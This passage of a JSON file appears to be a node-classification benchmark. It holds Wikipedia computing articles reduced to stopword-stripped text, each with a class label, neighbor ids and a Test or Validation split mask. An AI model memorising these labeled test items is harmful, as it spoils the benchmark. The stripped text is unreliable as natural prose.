    "text": "Cub_Linux:cub linux cub linux computer operating system designed mimic desktop appearance functionality chrome os based ubuntu linux lts 14.04 trusty tahr used openbox window manager tools taken lxde gnome xfce well number utilities cloud-centric operating system heavily focused chromium browser cub linux tagline cub chromium ubuntu cub linux originally called chromixium os developer richjack initially announced project ubuntu user forums september 19 2014 since project released first stable version chromixium 1.0 32 bit live iso april 26 2015 followed service pack address number issues screen tearing slow menu generation july 2015 number updates rolled new release version 1.5 initially 32 bit followed 64 bit release november 2015 point towards end 2015 google owns rights chrome os chromium trademarks requested richjack cease use chromixium mark related websites social media presences january 17 2016 richjack announced chromixium would changing name cub linux immediate effect chromixium name would completely dropped 31 march 2016 towards end 2016 cub linux website mysteriously disappeared github page still open user d4zzy involved cub linux development say sudden end cub killed due private life restrictions one time pick july 19 2017 developer feren os announced would bring ing back cub form phoenix linux page updated since release alpha 2 march 2018 jesse smith distrowatch weekly reviewed chromixium os 1.0",
    "neighbors": [
      8837,
      8957,
      7435,
      10127,
      2321,
      5397,
      4887,
      10394,
      10016,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      7983,
      2738,
      4790,
      439,
      56,
      59,
      7483,
      3903,
      3649,
      4673,
      8262,
      2375,
      4039,
      5067,
      8907,
      1110,
      9693,
      2914,
      4194,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      499,
      5363,
      9461,
      6393,
      11388,
      2045,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 6935,
    "label": 6,
    "text": "SSHFS:sshfs computing sshfs ssh filesystem filesystem client mount interact directories files located remote server workstation normal ssh connection client interacts remote file system via ssh file transfer protocol sftp network protocol providing file access file transfer file management functionality reliable data stream designed extension secure shell protocol ssh version 2.0 current implementation sshfs using fuse rewrite earlier version rewrite done miklos szeredi also wrote fuse sftp provides secure file transfer secure remote file system sftp clients may transfer files directories related file system may mounted locally using sftp alone using sshfs remote file system may treated way volumes cds dvds usb flash drives shared disks using unix command ls sshfs sometimes list owner file correctly although possible map manually distributed remote file systems multiple users protocols apple filing protocol network file system server message block often used sshfs alternative protocols situations users confident files directories targeted writing another user time advantage sshfs compared network file system protocols given user already ssh access host require additional configuration work opening additional entry ports firewall",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      10341,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      788,
      11033,
      287,
      1825,
      6434,
      6436,
      5413,
      8998,
      3368,
      4907,
      9004,
      302,
      7983,
      11568,
      6961,
      6963,
      1844,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      7018,
      5492,
      11638,
      6519,
      376,
      11127,
      890,
      11128,
      2432,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 6936,
    "label": 3,
    "text": "Fast_interrupt_request:fast interrupt request fast interrupt requests fiqs specialized type interrupt request standard technique used computer cpus deal events need processed occur receiving data network card keyboard mouse actions fiqs specific arm cpu architecture supports two types interrupts fiqs fast low latency interrupt handling interrupt requests irqs general interrupts fiq takes priority irq arm system also one fiq source time supported helps reduce interrupt latency interrupt service routine executed directly without determining source interrupt context save required servicing fiq since set banked registers reduces overhead context switching",
    "neighbors": [
      9964,
      3175
    ],
    "mask": "Test"
  },
  {
    "node_id": 6937,
    "label": 4,
    "text": "Eye_vein_verification:eye vein verification eye vein verification method biometric authentication applies pattern-recognition techniques video images veins user eyes complex random patterns unique modern hardware software detect differentiate patterns distance eyes veins sclera—the white part eyes—can imaged person glances either side providing four regions patterns one side eye verification employs digital templates patterns templates encoded mathematical statistical algorithms allow confirmation identity proper user rejection anyone else advocates eye vein verification note one technology strengths stability pattern eye blood vessels patterns change age alcohol consumption allergies redness eye veins clear enough reliably imaged cameras smartphones technology works contacts glasses though sunglasses least one version eye vein detection uses infrared illumination part imaging allowing imaging even low-light conditions dr. reza derakhshani university missouri kansas city developed concept using veins whites eyes identification holds several patents technology including 2008 patent concept using blood vessels seen whites eye unique identifier recent research explored using vein patterns iris sclera recognition eye vein verification like methods biometric authentication used range security situations including mobile banking government security healthcare environments eyeverify kansas city kansas company markets eye vein verification system called eyeprint 2012 eyeverify licensed technology developed patented derakhshani derakhshani serves chief science officer eyeverify",
    "neighbors": [
      2737,
      10207
    ],
    "mask": "Test"
  },
  {
    "node_id": 6938,
    "label": 4,
    "text": "Browser_exploit:browser exploit browser exploit form malicious code takes advantage flaw vulnerability operating system piece software intent breach browser security alter user browser settings without knowledge malicious code may exploit activex html images java javascript web technologies cause browser run arbitrary code users whose web browsers fallen victim successful browser exploit may find homepage search page and/or favorites changed signs include internet settings options within browser altered access blocked specific functions redirection incorrectly typed url prefixes multiple ways users protect web browsers falling victim browser exploit things include installing firewall software keeping software updated cautious downloading files opening email attachments unknown sources jailbreakme series browser based exploits used jailbreak apple ios mobile operating system uses exploit browser pdf parser execute unauthorised code gain access underlying operating system",
    "neighbors": [
      450,
      3462,
      8200,
      6537,
      10026,
      7482,
      5677,
      7515,
      4883,
      2259,
      7098,
      3643,
      4957
    ],
    "mask": "Test"
  },
  {
    "node_id": 6939,
    "label": 6,
    "text": "Ranish_Partition_Manager:ranish partition manager ranish partition manager freeware hard disk partition editor disk cloning utility boot manager gives high level control creating multi-boot systems available freeware live cd systemrescuecd ultimate boot cd windows version runs ms-dos pc dos dr-dos freedos rpm create bit-identical partition clones see speed rpm runs instantly following aside tools run regularly used operating system rpm one fastest ways partition hard disk restore clone move operating system rpm updated many years unknown whether works dynamic disk large sector drive quirks display problems occur using drives much larger rpm written ranish partition manager used create manual backup primary partition table extended partition table using rpm possible convert logical drives primary partitions rpm done deleting logical drive moving beginning extended partition type 0x0f forward recreating primary partition location logical drive saving changes process reversed convert primary partition logical drive however conversions partition must deviate standard chs alignment logical drives usually start second head head 1 primary partitions usually start beginning cylinder modern operating systems probably would problems reading editing files converted drive software used re-sizing imaging partitions may decide silently correct partition moving beginning partition perhaps conform standard chs alignment conform 1-mib alignment re-sizing would prevent windows xp booting might prevent windows vista booting starting sector moved without updating vista boot files secondly user unaware partition moved may realize old backup partition table obsolete however another possible problem converting primary partitions logical drives unless primary partitions made purpose windows xp disk management known delete nonstandard extended partitions must least 63 sectors primary partition allocate ebr order make conversion reasons may preferable primary partition may converted extended partition start head 1 instead beginning cylinder space beginning cylinder head 1 free space previous partition end end last complete cylinder end earlier cylinder starting primary partitions head 1 instead head 0 another advantage allows bit-identical cloning primary partitions logical drives making completely normal usual logical drives ebrs logical drives beginning cylinder logical drive begins next head logical drive ends cylinder boundary however author tested installing booting operating systems primary partitions beginning head 1 first partition first partition usually begins head 1 cylinder begins master boot record like graphical partition editors gparted sector-precise meaning show numbers sectors cylinders partitions created however things rpm gparted resize partitions data ntfs fat etc format ntfs partitions although rpm able format fat partitions windows xp error partition formatted rpm ranish partition manager gnu parted parted display partitions one chs format sector precise parted show locations ebrs values contain linux information displayed using codice_1 format requires scrutinizing n't indicate errors/warnings color rpm unlike command line tools parted sfdisk rpms text user interface allows user move cursor anywhere partition table select values change parted riskier less efficient use saves every change soon made takes time update certain things rpm create partitions manually using wizard",
    "neighbors": [
      292,
      9166,
      2193,
      178,
      3315,
      3859,
      4563,
      2744,
      8857,
      1150
    ],
    "mask": "None"
  },
  {
    "node_id": 6940,
    "label": 2,
    "text": "Hero_of_Sparta:hero sparta hero sparta action-adventure game developed published spanish studio gameloft iberica ios nintendo ds android playstation portable hd version also released ios android symbian devices versions removed play store game available android devices gameloft official website game follows storyline set ancient greece wherein player controls protagonist throughout multiple landscapes fighting mythical beasts game moderately well received critics game consists eight levels five ds version player controls spartan king wielding sword fighting various mythical beasts player collect different-colored orbs defeating enemies color corresponding different effect green orbs restore health blue restore magical energy red orbs grant experience points used upgrade damage special powers weapons found throughout course game versions game upgrading weapons maximum capacities cause take ultimate form game features real-time events called focus kills occur certain enemies nearly defeated player prompted input series controls tap screen perform finishing blow enemy successful focus kills award player orbs cases player required perform focus kills defeat bosses story centers around spartan king argos awakens beach shortly entire fleet ships wiped violent storm exploring island spirit oracle apparently held captivity pleads argos rescue exchange oracle offers use power return argos homeland game directly compared god war franchise even called shameless god war rip-off sequel hero sparta ii released july 29 2010",
    "neighbors": [
      10330,
      7029,
      11254
    ],
    "mask": "None"
  },
  {
    "node_id": 6941,
    "label": 2,
    "text": "Nagare_(web_framework):nagare web framework nagare free open-source web framework developing web applications stackless python nagare uses component model inspired seaside like seaside nagare uses continuations provide framework http connectionless request response cycle n't break normal control flow application allows web applications developed much way desktop applications rapid application development however nagare written python rather smalltalk",
    "neighbors": [
      1920,
      3462,
      8582,
      2062,
      9614,
      148,
      1812,
      9245,
      10526,
      8739,
      3876,
      4777,
      7980,
      5165,
      4529,
      7987,
      692,
      8883,
      5048,
      6074,
      9666,
      8644,
      1353,
      595,
      4056,
      6493,
      102,
      8554,
      8691,
      119,
      3705,
      11259
    ],
    "mask": "None"
  },
  {
    "node_id": 6942,
    "label": 3,
    "text": "Advanced_RISC_Computing:advanced risc computing advanced risc computing arc specification promulgated defunct consortium computer manufacturers advanced computing environment project setting forth standard mips risc-based computer hardware firmware environment although ace went defunct computer ever manufactured fully complied arc standard arc system widespread legacy windows nt family operating systems use arc conventions naming boot devices sgi uses modified version arc firmware calls arcs systems sgi computers run irix 6.1 later indy octane boot arcs console uses drive naming conventions windows accordingly addition various risc-based computers designed run windows nt used versions arc boot console boot nt include following predicted intel ia-32-based computers would adopt arc console although sgi ever marketed machines arc firmware namely sgi visual workstation series launched 1999 products complying degree arc standard include",
    "neighbors": [
      5380,
      9742,
      7311,
      8976,
      2452,
      9723,
      408,
      7215,
      11058,
      7093,
      2811,
      7234,
      10051,
      3142,
      6854,
      5076,
      6879,
      3945,
      3818,
      5873,
      3323,
      8700,
      11007
    ],
    "mask": "Test"
  },
  {
    "node_id": 6943,
    "label": 7,
    "text": "Presto_(SQL_query_engine):presto sql query engine presto high performance distributed sql query engine big data architecture allows users query variety data sources hadoop aws s3 alluxio mysql cassandra kafka mongodb one even query data multiple data sources within single query presto community driven open-source software released apache license presto originally designed developed facebook data analysts run interactive queries large data warehouse apache hadoop presto data analysts facebook relied apache hive running sql analytics multi petabyte data warehouse hive inadequate facebook scale presto invented fill gap run fast queries original development started 2012 deployed facebook later year november 2013 facebook announced release open source 2013 2014 netflix disclosed used presto 10 petabytes data stored amazon simple storage service s3 january 2019 presto software foundation announced foundation not-for-profit organization dedicated advancement presto open source distributed sql query engine development presto continues independently prestodb maintained facebook prestosql maintained presto software foundation cross pollination code presto ’ architecture similar classic database management system using cluster computing mpp visualized one coordinator node working sync multiple worker nodes clients submit sql statements get parsed planned following parallel tasks scheduled workers workers jointly process rows data sources produce results returned client compared original apache hive execution model used hadoop mapreduce mechanism query presto write intermediate results disk resulting significant speed improvement presto written java programming language single presto query combine data multiple sources presto offers connectors data sources including files alluxio hadoop distributed file system amazon s3 mysql postgresql microsoft sql server amazon redshift apache kudu apache phoenix apache kafka apache cassandra apache accumulo mongodb redis unlike hadoop distribution-specific tools cloudera impala presto work flavor hadoop without presto supports separation compute storage may deployed premises cloud",
    "neighbors": [
      11030,
      8217,
      10661,
      5677,
      10413,
      7983,
      7347,
      5047,
      5691,
      11201,
      1222,
      5960,
      11343,
      8539,
      990,
      4194,
      11111,
      5612,
      7022,
      2163,
      7288
    ],
    "mask": "None"
  },
  {
    "node_id": 6944,
    "label": 7,
    "text": "Multisite_cloud:multisite cloud multisite cloud cloud composed several single sites data centers different providers explicitly accessible cloud users multisite cloud environment tasks program workflow scheduled order achieve efficient processing",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 6945,
    "label": 4,
    "text": "Aloysius_Cheang:aloysius cheang aloysius cheang managing director apac cloud security alliance another role standards secretariat overseeing standardization efforts within csa cloud security alliance owning relationships sdos aloysius former member singapore government chief security officer roundtable founder sig^2 2001 also held senior executive positions various consulting companies telco worldwide remit sig^2 rose become de facto security community asia lead formalisation singapore government-backed association information security professionals aisp cheang pro tem chairman 2006–2007 also co-editor iso/iec 27032 guidelines cybersecurity represented singapore iso/iec/jtc 1 sc 27 wg4 previous contribution ss 507 “ business continuity/disaster recovery industry standard ” adopted iso/iec 24762 cheang sits singapore standards committee national infocomm competency framework security sub-committee cheang professional certifications include cisa cissp gcih first microsoft security mvp south asia member microsoft sea mvp hall fame views presented times asia cio asia zdnet computerworld new paper mypaper sin chew daily wen wei po straits times channelnewsasia independent source specialist opinion",
    "neighbors": [
      997
    ],
    "mask": "Test"
  },
  {
    "node_id": 6946,
    "label": 5,
    "text": "OFTP:oftp odette file transfer protocol oftp protocol created 1986 used edi electronic data interchange two communications business partners name comes odette organisation organization data exchange teletransmission europe odette file transfer protocol odette-ftp defined 1986 working group four organisation data exchange tele-transmission europe odette address electronic data interchange edi requirements european automotive industry designed spirit open system interconnection osi model utilising network service provided ccitt x.25 recommendation oftp 2 written 2007 data interchange specification secure transfer business documents internet isdn x.25 networks description oftp 1.3 found rfc 2204 whilst oftp 2 defined rfc 5024 oftp 2 work point-to-point indirectly via van value added network single oftp 2 entity make receive calls exchanging files directions means oftp 2 work push pull mode opposed as2 work push mode oftp 2 encrypt digitally sign message data request signed receipts also offers high levels data compression services available using oftp 2 tcp/ip x.25/isdn native x.25 used tcp/ip network internet additional session level security available using oftp 2 tls transport layer security",
    "neighbors": [
      2432,
      6993
    ],
    "mask": "Test"
  },
  {
    "node_id": 6947,
    "label": 2,
    "text": "Valerie_Aurora:valerie aurora valerie anita aurora software engineer feminist activist co-founder ada initiative non-profit organization sought increase women participation free culture movement open source technology open source culture aurora also known within linux community advocating new developments filesystems linux including chunkfs union file system birth name val henson changed shortly 2009 choosing middle name computer scientist anita borg 2012 aurora ada initiative co-founder mary gardiner named two influential people computer security sc magazine 2013 o'reilly open source award aurora raised new mexico home-schooled became involved computer programming attended def con 1995 studied computer science mathematics new mexico institute mining technology first became involved file systems worked zfs 2002 sun microsystems later moved ibm worked group theodore ts considered extensions ext2 ext3 linux file systems working intel implemented ext2 dirty bit relative atime along arjan van de ven came idea chunkfs simplifies file system checks dividing file system independent pieces also co-organized first linux file systems workshop order figure spread awareness raise funding file system development 2009 worked red hat file systems developer well part-time science writer linux consultant already activist women open source joined mary gardiner members geek feminism blog develop anti-harassment policies conferences noirin shirley sexually assaulted apachecon 2010 aurora quit job linux kernel developer red hat gardiner founded ada initiative february 2011 organization named ada lovelace worked charles babbage considered world first computer programmer two years later aurora founded double union hackerspace women amelia greenhall liz henry banned 2018 ada initiative shut october 2015 maintaining blog since 2007 aurora written extensively coding experiences women open source included descriptions def con harassment took place 2013 aurora provided comment verge electronic frontier foundation involvement legal defense andrew auernheimer prison hacking previously harassed kathy sierra aurora said another case 're saying 'the cases care ones white men interested ’ less interested protecting women web comment received negatively eff director international freedom expression jillian york another 2013 controversy received commentary aurora donglegate pycon attendee adria richards faced backlash reporting conversation overheard two men sitting near aurora condemned threats sent richards stated anonymous using large numbers computers distorting social pressure asked firing one males appropriate response said n't enough information know two years later aurora praised gender ratio pycon called guido van rossum python community biggest success story women open source interview approved culture website tumblr stated linus torvalds daughter patricia positive role-model",
    "neighbors": [
      1026,
      5644,
      4367,
      8848,
      657,
      10642,
      1939,
      2197,
      2581,
      2199,
      3478,
      6808,
      7450,
      10774,
      6302,
      7584,
      802,
      5410,
      6691,
      8354,
      5931,
      8364,
      10670,
      1717,
      823,
      441,
      2109,
      11069,
      10687,
      9665,
      10822,
      8263,
      843,
      589,
      6352,
      4177,
      11602,
      8787,
      11643,
      4437,
      6489,
      3802,
      4831,
      9696,
      11232,
      9455,
      7793,
      1394,
      5106,
      1396,
      3189,
      3323,
      2558,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 6948,
    "label": 8,
    "text": "Information_and_Content_Exchange:information content exchange information content exchange ice xml-based protocol used content syndication via internet using xml sender receiver agreed-upon language communicate using client–server architecture ice defines syndicate/subscribe model comparable binary publish/subscribe protocol standards used corba dcom however ice messages delivered xml typically http connection rather lower-level binary protocol first standard specifically web syndication ice proposed firefly networks vignette january 1998 two companies ceded control specification ice consortium consisted authoring group advisory council ice authoring group included microsoft adobe sun cnet national semiconductor tribune media services ziff davis reuters amongst others limited thirteen companies ice advisory council included nearly hundred members ice submitted world wide web consortium standards body october 26 1998 showcased press event day standard failed benefit open-source implementation w3c xml specifications often received version 1.1 protocol published july 1 2000 version 2.0 featured improved web service support released august 1 2004 versions appeared since vignette demo version ice-capable server named site-to-site february 1998 aiming show protocol could facilitate content exchange websites site-to-site initially scheduled release summer 1998 launched name vignette syndication server february 22 1999 syndication server vignette became primary ice vendor june 1999 vignette invested 14 million leading web syndicator isyndicate adopt vignette storyserver development isyndicate website part deal isydicate committed making content available ice protocol comparable xml specifications include wddx nitf xmlnews newsml prism well cdf rss atom open content syndication ocs twice java implementation ice 2.0 rice ruby implementation ice 1.1 twice rice developed maintained jim menard icecubes original java reference implementation ice 1.1 although actively maintained since december 2000",
    "neighbors": [
      9665,
      10020,
      10024,
      2222,
      124,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6949,
    "label": 3,
    "text": "Gekko_(microprocessor):gekko microprocessor gekko superscalar out-of-order 32-bit powerpc microprocessor custom-made ibm 2000 nintendo use cpu sixth generation game console nintendo gamecube later triforce arcade board gekko role game system facilitate game scripting artificial intelligence physics collision detection custom graphics lighting effects geometry smooth transformations moving graphics data system project announced 1999 ibm nintendo agreed one billion dollar contract cpu running approximately 400 mhz ibm chose modify existing powerpc 750cxe processor suit nintendo needs tight balanced operation alongside flipper graphics processor customization bus architecture dma compression floating point unit support special set simd instructions cpu made ground work custom lighting geometry effects could burst compressed data directly gpu gekko considered direct ancestor broadway processor also designed manufactured ibm powers wii console",
    "neighbors": [
      6914,
      7170,
      4868,
      10501,
      3846,
      4743,
      6663,
      5642,
      1548,
      1933,
      398,
      6926,
      3472,
      4881,
      659,
      7065,
      1563,
      1309,
      6815,
      10784,
      10658,
      3493,
      8102,
      6311,
      4136,
      1321,
      9391,
      10543,
      4017,
      5297,
      1461,
      8120,
      6715,
      9020,
      1725,
      1983,
      1985,
      10180,
      6981,
      2635,
      336,
      8530,
      3540,
      342,
      9302,
      4569,
      2525,
      6878,
      11613,
      1635,
      8931,
      869,
      10214,
      10985,
      10734,
      1776,
      3185,
      4465,
      4211,
      5235,
      5237,
      5617,
      8058,
      3323,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 6950,
    "label": 3,
    "text": "Von_Neumann_architecture:von neumann architecture von neumann architecture—also known von neumann model princeton architecture—is computer architecture based 1945 description mathematician physicist john von neumann others first draft report edvac document describes design architecture electronic digital computer components term von neumann architecture evolved mean stored-program computer instruction fetch data operation occur time share common bus referred von neumann bottleneck often limits performance system design von neumann architecture machine simpler harvard architecture machine—which also stored-program system one dedicated set address data buses reading writing memory another set address data buses fetch instructions stored-program digital computer keeps program instructions data read-write random-access memory ram stored-program computers advancement program-controlled computers 1940s colossus eniac programmed setting switches inserting patch cables route data control signals various functional units vast majority modern computers use memory data program instructions von neumann vs. harvard distinction applies cache architecture main memory split cache architecture earliest computing machines fixed programs simple computers still use design either simplicity training purposes example desk calculator principle fixed program computer basic mathematics run word processor games changing program fixed-program machine requires rewiring restructuring redesigning machine earliest computers much programmed designed particular task reprogramming —when possible all—was laborious process started flowcharts paper notes followed detailed engineering designs often-arduous process physically rewiring rebuilding machine could take three weeks set debug program eniac proposal stored-program computer changed stored-program computer includes design instruction set store memory set instructions program details computation stored-program design also allows self-modifying code one early motivation facility need program increment otherwise modify address portion instructions operators manually early designs became less important index registers indirect addressing became usual features machine architecture another use embed frequently used data instruction stream using immediate addressing self-modifying code largely fallen favor since usually hard understand debug well inefficient modern processor pipelining caching schemes large scale ability treat instructions data makes assemblers compilers linkers loaders automated programming tools possible makes programs write programs possible made sophisticated self-hosting computing ecosystem flourish around von neumann architecture machines high level languages leverage von neumann architecture providing abstract machine-independent way manipulate executable code runtime e.g. lisp using runtime information tune just-in-time compilation e.g languages hosted java virtual machine languages embedded web browsers smaller scale repetitive operations bitblt pixel vertex shaders accelerated general purpose processors just-in-time compilation techniques one use self-modifying code remained popular mathematician alan turing alerted problem mathematical logic lectures max newman university cambridge wrote paper 1936 entitled computable numbers application entscheidungsproblem published proceedings london mathematical society described hypothetical machine called universal computing machine known universal turing machine hypothetical machine infinite store memory today terminology contained instructions data john von neumann became acquainted turing visiting professor cambridge 1935 also turing phd year institute advanced study princeton new jersey 1936 – 1937 whether knew turing paper 1936 time clear 1936 konrad zuse also anticipated two patent applications machine instructions could stored storage used data independently j. presper eckert john mauchly developing eniac moore school electrical engineering university pennsylvania wrote stored-program concept december 1943 von neumann involved manhattan project los alamos national laboratory required huge amounts calculation drew eniac project summer 1944 joined ongoing discussions design stored-program computer edvac part group wrote description titled first draft report edvac based work eckert mauchly unfinished colleague herman goldstine circulated von neumann name consternation eckert mauchly paper read dozens von neumann colleagues america europe influenced next round computer designs jack copeland considers historically inappropriate refer electronic stored-program digital computers 'von neumann machines los alamos colleague stan frankel said von neumann regard turing ideas time first draft report circulated turing producing report entitled proposed electronic calculator described engineering programming detail idea machine called automatic computing engine ace presented executive committee british national physical laboratory february 19 1946 although turing knew wartime experience bletchley park proposed feasible secrecy surrounding colossus subsequently maintained several decades prevented saying various successful implementations ace design produced von neumann turing papers described stored-program computers von neumann earlier paper achieved greater circulation computer architecture outlined became known von neumann architecture 1953 publication faster thought symposium digital computing machines edited b. v. bowden section chapter computers america reads follows machine institute advanced studies princeton 1945 professor j. von neumann working moore school engineering philadelphia e.n.i.a.c built issued behalf group co-workers report logical design digital computers report contained detailed proposal design machine since become known e.d.v.a.c electronic discrete variable automatic computer machine recently completed america von neumann report inspired construction e.d.s.a.c electronic delay-storage automatic calculator cambridge see page 130 1947 burks goldstine von neumann published another report outlined design another type machine parallel machine time would exceedingly fast capable perhaps 20,000 operations per second pointed outstanding problem constructing machine development suitable memory instantaneously accessible contents first suggested using special vacuum tube—called selectron —which princeton laboratories rca invented tubes expensive difficult make von neumann subsequently decided build machine based williams memory machine—completed june 1952 princeton—has become popularly known maniac design machine inspired least half dozen machines built america known affectionately johniacs book first two paragraphs chapter ace read follows automatic computation national physical laboratory one modern digital computers embodies developments improvements technique automatic electronic computing recently demonstrated national physical laboratory teddington designed built small team mathematicians electronics research engineers staff laboratory assisted number production engineers english electric company limited equipment far erected laboratory pilot model much larger installation known automatic computing engine although comparatively small bulk containing 800 thermionic valves judged plates xii xiii xiv extremely rapid versatile calculating machine basic concepts abstract principles computation machine formulated dr. a. m. turing f.r.s. paper read london mathematical society 1936 work machines britain delayed war 1945 however examination problems made national physical laboratory mr. j. r. womersley superintendent mathematics division laboratory joined dr. turing small staff specialists 1947 preliminary planning sufficiently advanced warrant establishment special group already mentioned april 1948 latter became electronics section laboratory charge mr. f. m. colebrook first draft described design used many universities corporations construct computers among various computers illiac ordvac compatible instruction sets date information following chronology difficult put proper order dates first running test program dates first time computer demonstrated completed dates first delivery installation decades 1960s 1970s computers generally became smaller faster led evolutions architecture example memory-mapped i/o lets input output devices treated memory single system bus could used provide modular system lower cost sometimes called streamlining architecture subsequent decades simple microcontrollers would sometimes omit features model lower cost size larger computers added features higher performance shared bus program memory data memory leads von neumann bottleneck limited throughput data transfer rate central processing unit cpu memory compared amount memory single bus access one two classes memory time throughput lower rate cpu work seriously limits effective processing speed cpu required perform minimal processing large amounts data cpu continually forced wait needed data move memory since cpu speed memory size increased much faster throughput bottleneck become problem problem whose severity increases every new generation cpu von neumann bottleneck described john backus 1977 acm turing award lecture according backus surely must less primitive way making big changes store pushing vast numbers words back forth von neumann bottleneck tube literal bottleneck data traffic problem importantly intellectual bottleneck kept us tied word-at-a-time thinking instead encouraging us think terms larger conceptual units task hand thus programming basically planning detailing enormous traffic words von neumann bottleneck much traffic concerns significant data find several known methods mitigating von neumann performance bottleneck example following improve performance problem also sidestepped somewhat using parallel computing using example non-uniform memory access numa architecture—this approach commonly employed supercomputers less clear whether intellectual bottleneck backus criticized changed much since 1977 backus proposed solution major influence modern functional programming object-oriented programming much less geared towards pushing vast numbers words back forth earlier languages like fortran internally still computers spend much time even highly parallel supercomputers 1996 database benchmark study found three four cpu cycles spent waiting memory researchers expect increasing number simultaneous instruction streams multithreading single-chip multiprocessing make bottleneck even worse context multi-core processors additional overhead required maintain cache coherence processors threads aside von neumann bottleneck program modifications quite harmful either accident design simple stored-program computer designs malfunctioning program damage programs operating system possibly leading computer crash memory protection forms access control usually protect accidental malicious program modification",
    "neighbors": [
      7170,
      7173,
      6664,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      5682,
      7218,
      1591,
      2619,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      3178,
      3693,
      8815,
      630,
      8822,
      6268,
      3197,
      7313,
      6815,
      8352,
      5793,
      6818,
      4773,
      6821,
      7852,
      9391,
      2224,
      2737,
      2226,
      7858,
      9911,
      2745,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      219,
      731,
      11487,
      5861,
      7911,
      10985,
      9964,
      5358,
      8430,
      1776,
      5872,
      8944,
      5364,
      757,
      2805,
      10485,
      249,
      8700,
      7421,
      4866,
      1798,
      8966,
      1801,
      6926,
      6415,
      1298,
      11539,
      6420,
      1823,
      1826,
      2339,
      3886,
      7983,
      309,
      8501,
      5948,
      4928,
      4417,
      8514,
      3910,
      4423,
      8523,
      6476,
      2383,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      6502,
      8551,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5518,
      10641,
      5523,
      6036,
      407,
      409,
      1952,
      8609,
      10658,
      9126,
      9638,
      10669,
      1967,
      2480,
      10675,
      1461,
      1462,
      1463,
      1976,
      7607,
      4030,
      453,
      3014,
      3529,
      9169,
      466,
      4569,
      1499,
      477,
      1502,
      7134,
      5090,
      995,
      7653,
      3050,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 6951,
    "label": 5,
    "text": "WebRTC_Gateway:webrtc gateway webrtc gateway connects webrtc established voip technology sip webrtc web real-time communication api definition drafted world wide web consortium w3c supports browser-to-browser applications voice calling video chat messaging without need either internal external plugins enable browsers using different application providers communicate e.g user logged application providers x wants call someone logged application provider so-called webrtc trapezoid used case two providers use widely used voip signalling protocol sip federate however respective browser-based clients signals server using proprietary application protocols built top http websocket component mediates webrtc sip referred webrtc gateway beside connecting different webrtc applications webrtc gateway also enables communication webrtc phone voip even pstn phone thereby webrtc gateway extends scope webrtc applications enables much wider reach usage scenarios usual process webrtc user downloads webrtc javascript application application used communicate another user webrtc gateway would usually contain server user would download webrtc javascript application receiving call user webrtc gateway needs decide whether callee reachable webrtc call translated sip example translate call sip gateway map different layers already number open source commercial solutions available providing webrtc gateway functionality lot required functionality webrtc gateway media handling signalling mapping supported sbc function webrtc gateway often integrated sbcs provided sbc vendors",
    "neighbors": [
      9381,
      3462,
      9834,
      10924,
      7214,
      5972,
      11413,
      124,
      10271
    ],
    "mask": "None"
  },
  {
    "node_id": 6952,
    "label": 0,
    "text": "Variable_rules_analysis:variable rules analysis linguistics variable rules analysis set statistical analysis methods commonly used sociolinguistics historical linguistics describe patterns variation alternative forms language use also sometimes known varbrul analysis name software package dedicated carrying relevant statistical computations varbrul variable rule method goes back theoretical approach developed sociolinguist william labov late 1960s early 1970s mathematical implementation developed henrietta cedergren david sankoff 1974 variable rules analysis designed provide quantitative model situation speakers alternate different forms meaning stand free variation way probability choice either one form conditioned variety context factors social characteristics situation variation entirely random rule-governed also known structured variation variable rules analysis computes multivariate statistical model basis observed token counts determining factor assigned numerical factor weight describes influences probabilities choice either form done means stepwise logistic regression using maximum likelihood algorithm although necessary computations required variable rules analysis carried help mainstream general-purpose statistics software packages spss often done means specialised software dedicated needs linguists called varbrul originally written david sankoff currently exists freeware implementations mac os microsoft windows title goldvarb x also versions implemented statistical language r therefore available platforms include r-varb rbrul variable rules approaches commonly employed analysis data sociolinguistic research especially studies aim investigate reflexes linguistic change time appear shape structured variation patterns within speech community",
    "neighbors": [
      5833,
      5450,
      6797
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6953,
    "label": 1,
